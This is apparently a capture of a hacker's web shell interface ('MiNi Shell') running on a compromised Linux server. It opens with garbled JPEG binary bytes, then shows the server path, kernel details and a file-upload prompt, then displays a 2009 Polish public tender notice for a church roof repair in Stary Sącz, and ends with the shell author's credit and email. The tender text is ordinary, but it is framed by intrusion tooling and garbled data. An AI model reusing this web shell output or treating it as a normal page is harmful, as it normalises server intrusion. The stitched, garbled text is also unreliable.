JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090421/114320-N-2009.html

<p class="kh_header"><b>Stary Sącz: remont dachu zabytkowego  kościoła w zespole klasztornym SS Klarysek p.w. św. Trójcy położonego w Starym Sączu na działce 2076</b><br>
<b>Numer ogłoszenia: 114320 - 2009; data zamieszczenia: 21.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta  i Gminy Stary Sącz , ul. Stefana Batorego 25, 33-340 Stary Sącz, woj. małopolskie, tel. 018 4460270, faks 018 4460273.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stary.sacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> remont dachu zabytkowego  kościoła w zespole klasztornym SS Klarysek p.w. św. Trójcy położonego w Starym Sączu na działce 2076.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> II.1.3.1. Przedmiot zamówienia obejmuje wykonanie robót konserwatorsko-budowlanych nawy kościoła oraz sygnaturki w zakresie :
- robót rozbiórkowych,
- robót ciesielskich (wg technologii obróbki i montażu jak w więźbie oryginalnej. Drewno należy ociosać a złącza należy mocować na kołki .Nie dopuszcza się wbudowania jakichkolwiek elementów drewnach nie okorowanych lub porażonych szkodnikami biologicznymi. Wszystkie zastrzały należy montować z tramami na jaskółczy ogon),
- impregnacji konstrukcji drewnianych,
- robót blacharskich 
- obróbek blacharskich (rynny, rury spustowe),
- prac konserwatorskich przy sygnaturce,
- instalacji odgromowej,
- dokumentacji fotograficznej robót konserwatorsko-budowlanych.

Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji technicznej.
Roboty należy wykonać zgodnie z dokumentacją projektową i  STWiOR

II.1.3.2. Zmawiający dysponuje dokumentami upoważniającymi do przeprowadzenia prac konserwatorsko budowlanych w zakresie remontu dachu zabytkowego  kościoła w zespole klasztornym SS Klarysek p.w. św. Trójcy położonego w Starym Sączu na działce 2076 :
- prawomocnym pozwoleniem nr 13/2009, z dnia 22 stycznia 2009 roku Wojewódzkiego Konserwatora Zabytków, wydanym przez Wojewódzki Urząd Ochrony Zabytków w Krakowie - Delegatura w Nowym Sączu za pismem znak OZNS.ZL.550-9/09
- prawomocną decyzją nr 118/2009 , z dnia 29 stycznia 2009 roku Starosty Nowosądeckiego zatwierdzającą projekt budowlany i udzielającą pozwolenie na budowę, wydaną za pismem znak GB.II.7351-6/13/09.

II.1.3.3. Do obowiązków Wykonawcy należeć będzie również ;
*  organizacja placu budowy,
* zabezpieczenie placu budowy przed dostępem osób trzecich,
* prowadzenie robót budowlanych zgodnie z zasadami Kodeksu Pracy oraz przy przestrzeganiu zasad bhp, ochrony zdrowia i środowiska oraz ochrony przeciwpożarowej,
* pokrycie kosztów zużycia energii elektrycznej i wody,
* zabezpieczenie obiektu przed wpływem czynników atmosferycznych,
* wykonanie niezbędnych sprawdzeń, badań i pomiarów  instalacji odgromowej wraz 
z metryką urządzenia piorunochronnego,
* wywóz i  utylizacja materiałów rozbiórkowych zgodnie z obowiązującymi przepisami,
* rozliczenie powierzonych materiałów budowlanych (blachy miedzianej,  drewna świerkowego, jodłowego oraz modrzewiowego),
* prowadzenie robót budowlanych w sposób umożliwiający zwiedzanie obiektu przez
pielgrzymów i turystów,
* prowadzenie robót budowlanych w sposób umożliwiający wykonywanie czynności religijnych.

II.1.3.4.Zamawiający zabezpiecza dla wykonania robót konserwatorsko-budowlanych :
a) blachę miedzianą  w niezbędnej ilości, 
b) drewno iglaste ( świerkowe, jodłowe i modrzewiowe) w klasie C-24..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.61-4, 45.21.23.50-4, 45.26.00.00-7, 45.42.20.00-1, 45.31.23.11-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> III.2.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki
określone w art. 22 ust. 1 pkt. 1-3 ustawy Pzp, tj.:
1) posiadają uprawnienia do wykonywania określonej w przedmiocie zamówienia działalności lub czynności;
a)odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej,
b) aktualna informacja z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art.24, ust. 1, pkt. 4 - 8 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych,
c) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art.24, ust.1, pkt.9 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych ,
d)zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego,
III.2.2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i
osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.:
a) wykonali w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania o udzielenie zamówienia tj. dniem 12 maja 2009r., a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej jedną robotę konserwatorko-budowlaną (remont, przebudowę, modernizację konstrukcji i pokryć dachowych) odpowiadającą swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia - budynków zaliczanych do klasy 1272 Polskiej Klasyfikacji Obiektów Budowlanych ( budynki przeznaczone do sprawowania kultu religijnego i czynności religijnych) lub obiektów budowlanych zaliczanych do klasy 1273 Polskiej Klasyfikacji Obiektów Budowlanych (obiektów budowlanych wpisanych do rejestru zabytków i objętych indywidualną ochroną konserwatorską oraz nieruchomych, archeologicznych dóbr kultury) z  zakresu  odpowiadających  przedsięwzięciu będącemu przedmiotem zamówienia z podaniem ich wartości, przedmiotu oraz daty i miejsca wykonania (wzór stanowi Załącznik Nr 7 do SIWZ). Do wykazu Wykonawca musi również dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.),
b) dysponują osobą/osobami posiadającą/posiadającymi uprawnienia do kierowania robotami budowlanymi w specjalnościach: 
-  konstrukcyjno-budowlanej oraz kwalifikacjami w zakresie nadzoru nad pracami budowlanymi przy zabytkowych obiektach architektury zgodnie z § 8 Rozporządzenia Ministra Kultury z dnia 09 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych i lub porzuconych zabytków ruchomych (Dz.U. Nr 150 poz.1579).
-  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
-  kierownika prac konserwatorskich  posiadającego należne wykształcenie - profil wykształcenia, o którym mowa w §7.1 i §7.2 Rozporządzenia Ministra Kultury z dnia 09.06.2004 (Dz.U. z 2004r. nr 150 poz.150),oraz zaświadczenie Państwowej Służby Ochrony Zabytków uprawniające do wykonywania prac konserwatorskich przy zabytkach ruchomych.
c) informacje na temat średniorocznego zatrudnienia pracowników w przeliczeniu na pełne 
etaty  w okresie ostatnich trzech lat, a przypadku gdy okres prowadzenia działalności jest 
krótszy - w tym okresie, w ilości nie mniejszej niż  10  pracowników rocznie 
III.2.3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
tj. posiadają polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 800.000,00 złotych.
III.2,4) nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy - Pzp.
Ocena spełnienia w/w warunków zostanie dokonana zgodnie z formułą spełnia nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wymaganych w SIWZ .

Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
2.1. Zamawiający dokona sprawdzenia spełnienia przez Wykonawców wymogów określonych w Prawie zamówień publicznych i SIWZ w zakresie kompletności i jakości oferty, a mianowicie pod uwagę będą brane oferty zawierające: komplet ważnych oświadczeń i dokumentów wymaganych niniejszą specyfikacją. Zamawiający informuje, iż sprawy doświadczenia, potwierdzeń należytego wykonania usług konserwatorskich, polis ubezpieczeniowych rozpatrywane będą łącznie - w przypadku składania ofert wspólnych.
2.2. W zakresie posiadania uprawnień do wykonywania określonej działalności i nie podlegania wykluczeniu z postępowania na podstawie art.24 ustawy: pod uwagę będą brane oferty, w których udokumentowano: zgodność prowadzonej działalności gospodarczej z zakresem objętym zamówieniem.
 2.3. Zamawiający zastrzega sobie prawo szczegółowego sprawdzenia stanu faktycznego 
 z przedłożonymi dokumentami, w tym również poprzez wezwanie Oferenta do wyjaśnienia 
  treści dokumentów.

  2.4. Zamawiający wzywa Oferentów, którzy w określonym terminie nie złożyli wymaganych przez 
       Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25, ust.1 Pzp, lub którzy nie złożyli pełnomocnictw albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25, ust. Pzp zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa  do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia  oferta Oferenta podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny  potwierdzać spełnianie przez Oferenta warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. OŚWIADCZENIA :
Oświadczenie o spełnianiu warunków art.22 ustawy Prawo Zamówień Publicznych.
W przypadku złożenia oferty wspólnej - oświadczenie że podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia.

B. DOKUMENTY (potwierdzające spełnienie warunków, o których mowa w art.22, ust.1 ustawy Prawo zamówień publicznych) :

3.1. Kserokopia aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do 
ewidencji działalności gospodarczej - wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, poświadczona za zgodność z oryginałem przez Oferenta. W przypadku Oferenta będącego Spółką Cywilną obowiązuje załączenie umowy spółki. 
3.2. Kserokopia aktualnej informacji z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art.24, ust. 1, pkt. 4 - 8 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, poświadczona za zgodność z oryginałem przez Oferenta
3.3. Kserokopia aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art.24, ust.1, pkt.9 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, poświadczona za zgodność z oryginałem przez Oferenta
3.4.Kserokopie  aktualnych zaświadczeń właściwego naczelnika Urzędu Skarbowego, oraz oddziału
Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, poświadczone za zgodność z oryginałem przez Oferenta
3.5. Ubiegające się o zamówienie publiczne spółki z o.o. muszą przedłożyć uchwałę wspólników upoważniającą  do zaciągnięcia zobowiązania lub umowę spółki, o ile wartość zamówienia dwukrotnie przekracza wartość kapitału spółki ( art.230 Kodeksu Spółek ).
3.6. Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego tj. dniem 12 maja 2009 roku, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej jedną robotę konserwatorsko-budowlaną (remont, przebudowę, modernizację konstrukcji i pokryć dachowych)  odpowiadającą swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia - budynków zaliczanych do klasy 1272 Polskiej Klasyfikacji Obiektów Budowlanych ( budynki przeznaczone do sprawowania kultu religijnego  i czynności religijnych) lub obiektów budowlanych zaliczanych do klasy 1273 Polskiej Klasyfikacji Obiektów Budowlanych (obiektów budowlanych wpisanych do rejestru zabytków i objętych indywidualną ochroną konserwatorską oraz nieruchomych, archeologicznych dóbr kultury) z  zakresu  odpowiadających  przedsięwzięciu będącemu przedmiotem zamówienia z podaniem ich wartości, przedmiotu oraz daty i miejsca wykonania. Dla każdej pozycji wykazu należy załączyć dokumenty (protokoły odbioru, referencje, itp.) potwierdzające, że roboty te zostały wykonane należycie.
3.7. Wykaz osób i podmiotów przewidzianych do realizacji zamówienia .
3.8. Dokumenty potwierdzające posiadanie uprawnień budowlanych do kierowania robotami budowlanymi w specjalnościach: 
a) konstrukcyjno-budowlanej oraz zaświadczeniem o posiadaniu kwalifikacji w zakresie nadzoru nad pracami budowlanymi przy zabytkowych obiektach architektury zgodnie z § 8 Rozporządzenia Ministra Kultury z dnia 09 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych i lub porzuconych zabytków ruchomych Dz.U. Nr 150 poz.1579) - (dokumenty mogą być przedstawione w postaci kserokopii poświadczonych za zgodność z oryginałem),
b) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, oraz zaświadczenie/ zaświadczenia, wydane przez właściwą izbę samorządu zawodowego, potwierdzające wpis danej osoby na listę członków właściwej izby (dokumenty mogą być przedstawione w postaci kserokopii poświadczonych za zgodność z oryginałem), 
c) kierownika prac konserwatorskich  posiadającego należne wykształcenie profil wykształcenia, o którym mowa w §7.1 i §7.2 Rozporządzenia Ministra Kultury z dnia 09.06.2004 (Dz.U. z 2004r. nr 150 poz.150),oraz zaświadczenie Państwowej Służby Ochrony Zabytków uprawniające do wykonywania prac konserwatorskich przy zabytkach ruchomych (dokumenty mogą być przedstawione w postaci kserokopii poświadczonych za zgodność z oryginałem
3.9. Wykaz narzędzi i urządzeń.
3.10. Informacja o średniorocznym zatrudnieniu w latach 2006/2007/2008.
3.11. Kserokopia polisy lub innego dokumentu ubezpieczenia potwierdzającego, że Oferent jest ubezpieczo-
ny od odpowiedzialności cywilnej , w zakresie działalności będącej przedmiotem zamówienia publicznego  
o wartości nie mniejszej niż 800.000,00 PLN.
3.12. Pełnomocnictwo Oferentów wspólnie ubiegający się o zamówienie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.stary-sacz.iap.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta ,  w 33-340 Stary Sącz - ul. Stefana Batorego 25 (pokój nr 21 - I piętro).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2009 godzina 09:45, miejsce: Klasztor Sióstr Klarysek,  w 33-340 Starym Sączu - Plac św. Kingi 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com